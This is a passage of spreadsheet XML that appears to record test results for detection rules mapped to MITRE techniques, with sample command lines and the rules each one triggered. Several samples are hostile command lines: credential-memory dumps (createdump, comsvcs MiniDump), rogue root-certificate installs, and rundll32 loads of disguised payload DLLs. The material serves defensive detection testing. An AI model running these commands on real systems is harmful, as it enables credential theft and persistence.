          <t>737e618a-a410-49b5-bec3-9e55ff7fbc15</t>
        </is>
      </c>
      <c r="E2779" s="43" t="inlineStr">
        <is>
          <t>calc.exe -version</t>
        </is>
      </c>
      <c r="F2779" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2779" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2779" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2779" s="43" t="inlineStr">
        <is>
          <t>Findstr Launching .lnk File (33339be3-148b-4e16-af56-ad16ec6c7e7b)</t>
        </is>
      </c>
      <c r="J2779" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2779" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2780" ht="15.75" customHeight="1" s="42">
      <c r="A2780" s="43" t="inlineStr">
        <is>
          <t>t1036</t>
        </is>
      </c>
      <c r="B2780" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_chcp_codepage_switch</t>
        </is>
      </c>
      <c r="C2780" s="43" t="inlineStr">
        <is>
          <t>Suspicious CodePage Switch Via CHCP</t>
        </is>
      </c>
      <c r="D2780" s="43" t="inlineStr">
        <is>
          <t>c7942406-33dd-4377-a564-0f62db0593a3</t>
        </is>
      </c>
      <c r="E2780" s="43" t="inlineStr">
        <is>
          <t>chcp 936</t>
        </is>
      </c>
      <c r="F2780" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2780" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2780" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2780" s="43" t="inlineStr">
        <is>
          <t>Findstr Launching .lnk File (33339be3-148b-4e16-af56-ad16ec6c7e7b)</t>
        </is>
      </c>
      <c r="J2780" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2780" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2781" ht="15.75" customHeight="1" s="42">
      <c r="A2781" s="43" t="inlineStr">
        <is>
          <t>t1036</t>
        </is>
      </c>
      <c r="B2781" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_chcp_codepage_switch</t>
        </is>
      </c>
      <c r="C2781" s="43" t="inlineStr">
        <is>
          <t>Suspicious CodePage Switch Via CHCP</t>
        </is>
      </c>
      <c r="D2781" s="43" t="inlineStr">
        <is>
          <t>c7942406-33dd-4377-a564-0f62db0593a3</t>
        </is>
      </c>
      <c r="E2781" s="43" t="inlineStr">
        <is>
          <t>chcp  936</t>
        </is>
      </c>
      <c r="F2781" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2781" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2781" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2781" s="43" t="inlineStr">
        <is>
          <t>Forfiles Command Execution (9aa5106d-bce3-4b13-86df-3a20f1d5cf0b)</t>
        </is>
      </c>
      <c r="J2781" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2781" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2782" ht="15.75" customHeight="1" s="42">
      <c r="A2782" s="43" t="inlineStr">
        <is>
          <t>t1036</t>
        </is>
      </c>
      <c r="B2782" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_createdump_lolbin_execution</t>
        </is>
      </c>
      <c r="C2782" s="43" t="inlineStr">
        <is>
          <t>CreateDump Process Dump</t>
        </is>
      </c>
      <c r="D2782" s="43" t="inlineStr">
        <is>
          <t>515c8be5-e5df-4c5e-8f6d-a4a2f05e4b48</t>
        </is>
      </c>
      <c r="E2782" s="43" t="inlineStr">
        <is>
          <t>"C:\\Program Files\\dotnet\\shared\\Microsoft.NETCore.App\\5.0.17\\createdump.exe" -u --name C:\\Users\\thaim\\AppData\\Local\\Temp\\dotnet-lsass.dmp 788</t>
        </is>
      </c>
      <c r="F2782" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2782" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2782" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2782" s="43" t="inlineStr">
        <is>
          <t>CodePage Modification Via MODE.COM To Russian Language (12fbff88-16b5-4b42-9754-cd001a789fb3)</t>
        </is>
      </c>
      <c r="J2782" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2782" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2783" ht="15.75" customHeight="1" s="42">
      <c r="A2783" s="43" t="inlineStr">
        <is>
          <t>t1553.004</t>
        </is>
      </c>
      <c r="B2783" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_certutil_certificate_installation</t>
        </is>
      </c>
      <c r="C2783" s="43" t="inlineStr">
        <is>
          <t>New Root Certificate Installed Via Certutil.EXE</t>
        </is>
      </c>
      <c r="D2783" s="43" t="inlineStr">
        <is>
          <t>d2125259-ddea-4c1c-9c22-977eb5b29cf0</t>
        </is>
      </c>
      <c r="E2783" s="43" t="inlineStr">
        <is>
          <t>certutil -addstore root C:\Users\ADMINI~1\AppData\Local\Temp\cert.cer</t>
        </is>
      </c>
      <c r="F2783" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2783" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2783" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2783" s="43" t="inlineStr">
        <is>
          <t>New Root Certificate Installed Via CertMgr.EXE (ff992eac-6449-4c60-8c1d-91c9722a1d48)</t>
        </is>
      </c>
      <c r="J2783" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2783" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2784" ht="15.75" customHeight="1" s="42">
      <c r="A2784" s="43" t="inlineStr">
        <is>
          <t>t1553.004</t>
        </is>
      </c>
      <c r="B2784" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_import_cert_susp_locations</t>
        </is>
      </c>
      <c r="C2784" s="43" t="inlineStr">
        <is>
          <t>Root Certificate Installed From Susp Locations</t>
        </is>
      </c>
      <c r="D2784" s="43" t="inlineStr">
        <is>
          <t>5f6a601c-2ecb-498b-9c33-660362323afa</t>
        </is>
      </c>
      <c r="E2784" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -c "Import-Certificate -FilePath 'C:\\Windows\\TEMP\\malicious.cer' -CertStoreLocation Cert:\\LocalMachine\\Root"</t>
        </is>
      </c>
      <c r="F2784" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2784" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2784" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2784" s="43" t="inlineStr">
        <is>
          <t>New Root Certificate Installed Via Certutil.EXE (d2125259-ddea-4c1c-9c22-977eb5b29cf0)</t>
        </is>
      </c>
      <c r="J2784" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2784" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2785" ht="15.75" customHeight="1" s="42">
      <c r="A2785" s="43" t="inlineStr">
        <is>
          <t>t1553.004</t>
        </is>
      </c>
      <c r="B2785" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_x509enrollment</t>
        </is>
      </c>
      <c r="C2785" s="43" t="inlineStr">
        <is>
          <t>Suspicious X509Enrollment - Process Creation</t>
        </is>
      </c>
      <c r="D2785" s="43" t="inlineStr">
        <is>
          <t>114de787-4eb2-48cc-abdb-c0b449f93ea4</t>
        </is>
      </c>
      <c r="E2785" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "$clsid = [guid]'884e2002-217d-11da-b2a4-000e7bbb2b09'; $type = [type]::GetTypeFromCLSID($clsid); $obj = [Activator]::CreateInstance($type)"</t>
        </is>
      </c>
      <c r="F2785" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2785" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2785" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2785" s="43" t="inlineStr">
        <is>
          <t>Suspicious X509Enrollment - Process Creation (114de787-4eb2-48cc-abdb-c0b449f93ea4); Suspicious X509Enrollment - Process Creation (114de787-4eb2-48cc-abdb-c0b449f93ea4)</t>
        </is>
      </c>
      <c r="J2785" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2785" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2786" ht="15.75" customHeight="1" s="42">
      <c r="A2786" s="43" t="inlineStr">
        <is>
          <t>t1218.011</t>
        </is>
      </c>
      <c r="B2786" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_citrix_trolleyexpress_procdump</t>
        </is>
      </c>
      <c r="C2786" s="43" t="inlineStr">
        <is>
          <t>Process Access via TrolleyExpress Exclusion</t>
        </is>
      </c>
      <c r="D2786" s="43" t="inlineStr">
        <is>
          <t>4c0aaedc-154c-4427-ada0-d80ef9c9deb6</t>
        </is>
      </c>
      <c r="E2786" s="43" t="inlineStr">
        <is>
          <t>TrolleyExpress.exe 755\r\n</t>
        </is>
      </c>
      <c r="F2786" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2786" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2786" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2786" s="43" t="inlineStr">
        <is>
          <t>HackTool - F-Secure C3 Load by Rundll32 (b18c9d4c-fac9-4708-bd06-dd5bfacf200f); HackTool - F-Secure C3 Load by Rundll32 (b18c9d4c-fac9-4708-bd06-dd5bfacf200f)</t>
        </is>
      </c>
      <c r="J2786" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2786" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2787" ht="15.75" customHeight="1" s="42">
      <c r="A2787" s="43" t="inlineStr">
        <is>
          <t>t1218.011</t>
        </is>
      </c>
      <c r="B2787" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_citrix_trolleyexpress_procdump</t>
        </is>
      </c>
      <c r="C2787" s="43" t="inlineStr">
        <is>
          <t>Process Access via TrolleyExpress Exclusion</t>
        </is>
      </c>
      <c r="D2787" s="43" t="inlineStr">
        <is>
          <t>4c0aaedc-154c-4427-ada0-d80ef9c9deb6</t>
        </is>
      </c>
      <c r="E2787" s="43" t="inlineStr">
        <is>
          <t>TrolleyExpress.exe 755 | echo bypass</t>
        </is>
      </c>
      <c r="F2787" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2787" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2787" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2787" s="43" t="inlineStr">
        <is>
          <t>HackTool - F-Secure C3 Load by Rundll32 (b18c9d4c-fac9-4708-bd06-dd5bfacf200f)</t>
        </is>
      </c>
      <c r="J2787" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2787" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2788" ht="15.75" customHeight="1" s="42">
      <c r="A2788" s="43" t="inlineStr">
        <is>
          <t>t1218.011</t>
        </is>
      </c>
      <c r="B2788" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_c3_rundll32_pattern</t>
        </is>
      </c>
      <c r="C2788" s="43" t="inlineStr">
        <is>
          <t>HackTool - F-Secure C3 Load by Rundll32</t>
        </is>
      </c>
      <c r="D2788" s="43" t="inlineStr">
        <is>
          <t>b18c9d4c-fac9-4708-bd06-dd5bfacf200f</t>
        </is>
      </c>
      <c r="E2788" s="43" t="inlineStr">
        <is>
          <t>rundll32.exe C:\Windows\Temp\payload.dll,StartNodeRelay</t>
        </is>
      </c>
      <c r="F2788" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2788" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2788" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2788" s="43" t="inlineStr">
        <is>
          <t>HackTool - F-Secure C3 Load by Rundll32 (b18c9d4c-fac9-4708-bd06-dd5bfacf200f); HackTool - F-Secure C3 Load by Rundll32 (b18c9d4c-fac9-4708-bd06-dd5bfacf200f)</t>
        </is>
      </c>
      <c r="J2788" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2788" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2789" ht="15.75" customHeight="1" s="42">
      <c r="A2789" s="43" t="inlineStr">
        <is>
          <t>t1218.011</t>
        </is>
      </c>
      <c r="B2789" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_c3_rundll32_pattern</t>
        </is>
      </c>
      <c r="C2789" s="43" t="inlineStr">
        <is>
          <t>HackTool - F-Secure C3 Load by Rundll32</t>
        </is>
      </c>
      <c r="D2789" s="43" t="inlineStr">
        <is>
          <t>b18c9d4c-fac9-4708-bd06-dd5bfacf200f</t>
        </is>
      </c>
      <c r="E2789" s="43" t="inlineStr">
        <is>
          <t>rundll32.exe C:\Windows\Temp\payload.dll, StartNodeRelay</t>
        </is>
      </c>
      <c r="F2789" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2789" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2789" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2789" s="43" t="inlineStr">
        <is>
          <t>CobaltStrike Load by Rundll32 (ae9c6a7c-9521-42a6-915e-5aaa8689d529)</t>
        </is>
      </c>
      <c r="J2789" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2789" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2790" ht="15.75" customHeight="1" s="42">
      <c r="A2790" s="43" t="inlineStr">
        <is>
          <t>t1218.011</t>
        </is>
      </c>
      <c r="B2790" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_cobaltstrike_load_by_rundll32</t>
        </is>
      </c>
      <c r="C2790" s="43" t="inlineStr">
        <is>
          <t>CobaltStrike Load by Rundll32</t>
        </is>
      </c>
      <c r="D2790" s="43" t="inlineStr">
        <is>
          <t>ae9c6a7c-9521-42a6-915e-5aaa8689d529</t>
        </is>
      </c>
      <c r="E2790" s="43" t="inlineStr">
        <is>
          <t>rundll32.exe payload.dll, StartW</t>
        </is>
      </c>
      <c r="F2790" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2790" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2790" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2790" s="43" t="inlineStr">
        <is>
          <t>CobaltStrike Load by Rundll32 (ae9c6a7c-9521-42a6-915e-5aaa8689d529)</t>
        </is>
      </c>
      <c r="J2790" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2790" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2791" ht="15.75" customHeight="1" s="42">
      <c r="A2791" s="43" t="inlineStr">
        <is>
          <t>t1218.011</t>
        </is>
      </c>
      <c r="B2791" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_pcwutl</t>
        </is>
      </c>
      <c r="C2791" s="43" t="inlineStr">
        <is>
          <t>Code Execution via Pcwutl.dll</t>
        </is>
      </c>
      <c r="D2791" s="43" t="inlineStr">
        <is>
          <t>9386d78a-7207-4048-9c9f-a93a7c2d1c05</t>
        </is>
      </c>
      <c r="E2791" s="43" t="inlineStr">
        <is>
          <t>rundll32.exe pcwutl.dll,LaunchApplication calc.exe</t>
        </is>
      </c>
      <c r="F2791" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2791" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2791" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2791" s="43" t="inlineStr">
        <is>
          <t>Code Execution via Pcwutl.dll (9386d78a-7207-4048-9c9f-a93a7c2d1c05)</t>
        </is>
      </c>
      <c r="J2791" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2791" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2792" ht="15.75" customHeight="1" s="42">
      <c r="A2792" s="43" t="inlineStr">
        <is>
          <t>t1218.011</t>
        </is>
      </c>
      <c r="B2792" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_installscreensaver</t>
        </is>
      </c>
      <c r="C2792" s="43" t="inlineStr">
        <is>
          <t>Rundll32 InstallScreenSaver Execution</t>
        </is>
      </c>
      <c r="D2792" s="43" t="inlineStr">
        <is>
          <t>15bd98ea-55f4-4d37-b09a-e7caa0fa2221</t>
        </is>
      </c>
      <c r="E2792" s="43" t="inlineStr">
        <is>
          <t>rundll32.exe desk.cpl,InstallScreenSaver test.scr</t>
        </is>
      </c>
      <c r="F2792" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2792" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2792" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2792" s="43" t="inlineStr">
        <is>
          <t>Code Execution via Pcwutl.dll (9386d78a-7207-4048-9c9f-a93a7c2d1c05); Potentially Suspicious Rundll32 Activity (e593cf51-88db-4ee1-b920-37e89012a3c9)</t>
        </is>
      </c>
      <c r="J2792" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2792" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2793" ht="15.75" customHeight="1" s="42">
      <c r="A2793" s="43" t="inlineStr">
        <is>
          <t>t1218.011</t>
        </is>
      </c>
      <c r="B2793" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_installscreensaver</t>
        </is>
      </c>
      <c r="C2793" s="43" t="inlineStr">
        <is>
          <t>Rundll32 InstallScreenSaver Execution</t>
        </is>
      </c>
      <c r="D2793" s="43" t="inlineStr">
        <is>
          <t>15bd98ea-55f4-4d37-b09a-e7caa0fa2221</t>
        </is>
      </c>
      <c r="E2793" s="43" t="inlineStr">
        <is>
          <t>rundll32.exe  desk.cpl,InstallScreenSaver test.scr</t>
        </is>
      </c>
      <c r="F2793" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2793" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2793" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2793" s="43" t="inlineStr">
        <is>
          <t>Code Execution via Pcwutl.dll (9386d78a-7207-4048-9c9f-a93a7c2d1c05); Rundll32 Execution With Uncommon DLL Extension (c3a99af4-35a9-4668-879e-c09aeb4f2bdf)</t>
        </is>
      </c>
      <c r="J2793" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2793" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2794" ht="15.75" customHeight="1" s="42">
      <c r="A2794" s="43" t="inlineStr">
        <is>
          <t>t1218.011</t>
        </is>
      </c>
      <c r="B2794" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_shell32_susp_execution</t>
        </is>
      </c>
      <c r="C2794" s="43" t="inlineStr">
        <is>
          <t>Shell32 DLL Execution in Suspicious Directory</t>
        </is>
      </c>
      <c r="D2794" s="43" t="inlineStr">
        <is>
          <t>32b96012-7892-429e-b26c-ac2bf46066ff</t>
        </is>
      </c>
      <c r="E2794" s="43" t="inlineStr">
        <is>
          <t>rundll32.exe "shell32,Control_RunDLL" payload.dll</t>
        </is>
      </c>
      <c r="F2794" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2794" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2794" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2794" s="43" t="inlineStr">
        <is>
          <t>Rundll32 InstallScreenSaver Execution (15bd98ea-55f4-4d37-b09a-e7caa0fa2221)</t>
        </is>
      </c>
      <c r="J2794" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2794" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2795" ht="15.75" customHeight="1" s="42">
      <c r="A2795" s="43" t="inlineStr">
        <is>
          <t>t1218.011</t>
        </is>
      </c>
      <c r="B2795" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_shell32_susp_execution</t>
        </is>
      </c>
      <c r="C2795" s="43" t="inlineStr">
        <is>
          <t>Shell32 DLL Execution in Suspicious Directory</t>
        </is>
      </c>
      <c r="D2795" s="43" t="inlineStr">
        <is>
          <t>32b96012-7892-429e-b26c-ac2bf46066ff</t>
        </is>
      </c>
      <c r="E2795" s="43" t="inlineStr">
        <is>
          <t>rundll32.exe shell32,Control_RunDLL payload.dll</t>
        </is>
      </c>
      <c r="F2795" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2795" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2795" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2795" s="43" t="inlineStr">
        <is>
          <t>Control Panel Items (0ba863e6-def5-4e50-9cea-4dd8c7dc46a4)</t>
        </is>
      </c>
      <c r="J2795" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2795" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2796" ht="15.75" customHeight="1" s="42">
      <c r="A2796" s="43" t="inlineStr">
        <is>
          <t>t1218.011</t>
        </is>
      </c>
      <c r="B2796" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_shell32_susp_execution</t>
        </is>
      </c>
      <c r="C2796" s="43" t="inlineStr">
        <is>
          <t>Shell32 DLL Execution in Suspicious Directory</t>
        </is>
      </c>
      <c r="D2796" s="43" t="inlineStr">
        <is>
          <t>32b96012-7892-429e-b26c-ac2bf46066ff</t>
        </is>
      </c>
      <c r="E2796" s="43" t="inlineStr">
        <is>
          <t>rundll32.exe Control_RunDLL,shell32 payload.dll</t>
        </is>
      </c>
      <c r="F2796" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2796" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2796" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2796" s="43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J2796" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2796" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2797" ht="15.75" customHeight="1" s="42">
      <c r="A2797" s="43" t="inlineStr">
        <is>
          <t>t1218.011</t>
        </is>
      </c>
      <c r="B2797" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_susp_activity</t>
        </is>
      </c>
      <c r="C2797" s="43" t="inlineStr">
        <is>
          <t>Potentially Suspicious Rundll32 Activity</t>
        </is>
      </c>
      <c r="D2797" s="43" t="inlineStr">
        <is>
          <t>e593cf51-88db-4ee1-b920-37e89012a3c9</t>
        </is>
      </c>
      <c r="E2797" s="43" t="inlineStr">
        <is>
          <t>C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll MiniDump 204 C:\Users\thaim\AppData\Local\Temp\svchost-exe.dmp full</t>
        </is>
      </c>
      <c r="F2797" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2797" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2797" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2797" s="43" t="inlineStr">
        <is>
          <t>Control Panel Items (0ba863e6-def5-4e50-9cea-4dd8c7dc46a4); Potentially Suspicious Rundll32 Activity (e593cf51-88db-4ee1-b920-37e89012a3c9); Potentially Suspicious Rundll32 Activity (e593cf51-88db-4ee1-b920-37e89012a3c9)</t>
        </is>
      </c>
      <c r="J2797" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2797" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2798" ht="15.75" customHeight="1" s="42">
      <c r="A2798" s="43" t="inlineStr">
        <is>
          <t>t1218.011</t>
        </is>
      </c>
      <c r="B2798" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_susp_activity</t>
        </is>
      </c>
      <c r="C2798" s="43" t="inlineStr">
        <is>
          <t>Potentially Suspicious Rundll32 Activity</t>
        </is>
      </c>
      <c r="D2798" s="43" t="inlineStr">
        <is>
          <t>e593cf51-88db-4ee1-b920-37e89012a3c9</t>
        </is>
      </c>
      <c r="E2798" s="43" t="inlineStr">
        <is>
          <t>"C:\Windows\System32\rundll32.exe" C:\windows\System32\comsvcs.dll,MiniDump 204 C:\Users\thaim\AppData\Local\Temp\svchost-exe.dmp full</t>
        </is>
      </c>
      <c r="F2798" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2798" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2798" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2798" s="43" t="inlineStr">
        <is>
          <t>Rundll32 Execution With Uncommon DLL Extension (c3a99af4-35a9-4668-879e-c09aeb4f2bdf)</t>
        </is>
      </c>
      <c r="J2798" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2798" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2799" ht="15.75" customHeight="1" s="42">
      <c r="A2799" s="43" t="inlineStr">
        <is>
          <t>t1218.011</t>
        </is>
      </c>
      <c r="B2799" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_susp_activity</t>
        </is>
      </c>
      <c r="C2799" s="43" t="inlineStr">
        <is>
          <t>Potentially Suspicious Rundll32 Activity</t>
        </is>
      </c>
      <c r="D2799" s="43" t="inlineStr">
        <is>
          <t>e593cf51-88db-4ee1-b920-37e89012a3c9</t>
        </is>
      </c>
      <c r="E2799" s="43" t="inlineStr">
        <is>
          <t>C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll,MiniDump 204 C:\Users\thaim\AppData\Local\Temp\svchost-exe.dmp full</t>
        </is>
      </c>
      <c r="F2799" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2799" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2799" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2799" s="43" t="inlineStr">
        <is>
          <t>Suspicious Rundll32 Activity Invoking Sys File (731231b9-0b5d-4219-94dd-abb6959aa7ea); Rundll32 Execution With Uncommon DLL Extension (c3a99af4-35a9-4668-879e-c09aeb4f2bdf)</t>
        </is>
      </c>
      <c r="J2799" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2799" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2800" ht="15.75" customHeight="1" s="42">
      <c r="A2800" s="43" t="inlineStr">
        <is>
          <t>t1218.011</t>
        </is>
      </c>
      <c r="B2800" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_susp_execution_with_image_extension</t>
        </is>
      </c>
      <c r="C2800" s="43" t="inlineStr">
        <is>
          <t>Suspicious Rundll32 Execution With Image Extension</t>
        </is>
      </c>
      <c r="D2800" s="43" t="inlineStr">
        <is>
          <t>4aa6040b-3f28-44e3-a769-9208e5feb5ec</t>
        </is>
      </c>
      <c r="E2800" s="43" t="inlineStr">
        <is>
          <t>cd C:\\test\\ &amp;&amp; copy malicious.dll photo.jpg &amp;&amp; rundll32.exe .\\photo.jpg,DllMain</t>
        </is>
      </c>
      <c r="F2800" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2800" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2800" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2800" s="43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2800" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2800" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2801" ht="15.75" customHeight="1" s="42">
      <c r="A2801" s="43" t="inlineStr">
        <is>
          <t>t1218.011</t>
        </is>
      </c>
      <c r="B2801" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_susp_execution_with_image_extension</t>
        </is>
      </c>
      <c r="C2801" s="43" t="inlineStr">
        <is>
          <t>Suspicious Rundll32 Execution With Image Extension</t>
        </is>
      </c>
      <c r="D2801" s="43" t="inlineStr">
        <is>
          <t>4aa6040b-3f28-44e3-a769-9208e5feb5ec</t>
        </is>
      </c>
      <c r="E2801" s="43" t="inlineStr">
        <is>
          <t>copy calc.dll calc.dat &amp;&amp; rundll32.exe calc.dat,DllMain</t>
        </is>
      </c>
      <c r="F2801" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2801" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2801" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2801" s="43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2801" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2801" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2802" ht="15.75" customHeight="1" s="42">
      <c r="A2802" s="43" t="inlineStr">
        <is>
          <t>t1218.011</t>
        </is>
      </c>
      <c r="B2802" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_susp_execution_with_image_extension</t>
        </is>
      </c>
      <c r="C2802" s="43" t="inlineStr">
        <is>
          <t>Suspicious Rundll32 Execution With Image Extension</t>
        </is>
      </c>
      <c r="D2802" s="43" t="inlineStr">
        <is>
          <t>4aa6040b-3f28-44e3-a769-9208e5feb5ec</t>
        </is>
      </c>
      <c r="E2802" s="43" t="inlineStr">
        <is>
          <t>rundll32.exe "C:\\path\\to\\malicious_image.jpg " ,DllMain</t>
        </is>
      </c>
      <c r="F2802" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2802" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2802" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2802" s="43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2802" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2802" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2803" ht="15.75" customHeight="1" s="42">
      <c r="A2803" s="43" t="inlineStr">
        <is>
          <t>t1059</t>
        </is>
      </c>
      <c r="B2803" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_ftp_arbitrary_command_execution</t>
        </is>
      </c>
      <c r="C2803" s="43" t="inlineStr">
        <is>
          <t>Potential Arbitrary Command Execution Via FTP.EXE</t>
        </is>
      </c>
      <c r="D2803" s="43" t="inlineStr">
        <is>
          <t>06b401f4-107c-4ff9-947f-9ec1e7649f1e</t>
        </is>
      </c>
      <c r="E2803" s="43" t="inlineStr">
        <is>
          <t>ftp /s:script.txt</t>
        </is>
      </c>
      <c r="F2803" s="43" t="b">
        <v>1</v>
